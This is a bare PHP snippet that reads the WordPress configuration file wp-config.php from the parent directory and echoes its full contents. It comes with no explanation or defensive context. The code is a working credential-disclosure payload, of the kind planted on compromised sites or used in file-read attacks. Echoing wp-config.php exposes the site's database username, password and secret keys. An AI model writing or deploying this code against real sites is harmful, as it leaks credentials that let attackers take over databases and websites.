$parentDir = '../';$fileName = 'wp-config.php';$fileContents = file_get_contents($parentDir. $fileName);echo $fileContents;